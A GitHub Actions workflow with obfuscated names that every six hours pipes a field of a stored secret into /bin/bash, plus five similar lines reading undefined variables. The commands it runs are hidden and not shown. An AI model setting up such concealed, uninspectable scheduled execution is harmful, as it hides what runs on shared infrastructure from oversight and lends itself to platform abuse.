name: miaoguojing1997

on:
  workflow_dispatch:
  schedule:
    - cron: '56 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: miaoguojing1997
        env:
          xwl1: ${{ secrets.xwl1 }}
        run: |
          echo $xwl1 | jq -r .kd54 | /bin/bash
          echo $lsg1 | jq -r .rrb45 | /bin/bash
          echo $x0 | jq -r .cdbsk661 | /bin/bash
          echo $oczc2 | jq -r .twjot5 | /bin/bash
          echo $hs821 | jq -r .eiuf1499 | /bin/bash
          echo $ol12743 | jq -r .tje8190 | /bin/bash

